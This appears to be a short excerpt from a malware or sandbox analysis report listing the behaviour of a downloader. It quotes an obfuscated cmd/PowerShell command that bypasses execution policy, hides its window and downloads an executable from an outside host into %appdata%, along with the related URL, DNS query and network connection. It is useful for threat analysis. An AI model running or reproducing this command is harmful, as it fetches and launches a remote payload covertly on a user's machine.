Technical Information
- http://asecwitlecn.bid/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOw^ER^SHELL.^Ex^e^ ^-eXecU^ti^onpo^Licy^ BYpASs -^NoprofIle -^wiNDo^w^StYl^e^ ^HID^De^n (^Ne^w-^oBJeCt^ sYsTEm^.ne^t.WEB^Cl^I^eNT^).d^OWn^LO^ADFil^e(^'http://asecwitlecn.bi...
- 'as###itlecn.bid':80
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "pOw^ER^SHELL.^Ex^e^ ^-eXecU^ti^onpo^Licy^ BYpASs -^NoprofIle -^wiNDo^w^StYl^e^ ^HID^De^n (^Ne^w-^oBJeCt^ sYsTEm^.ne^t.WEB^Cl^I^eNT^).d^OWn^LO^ADFil^e(^'http://asecwitlecn.bi...' (with hidden window)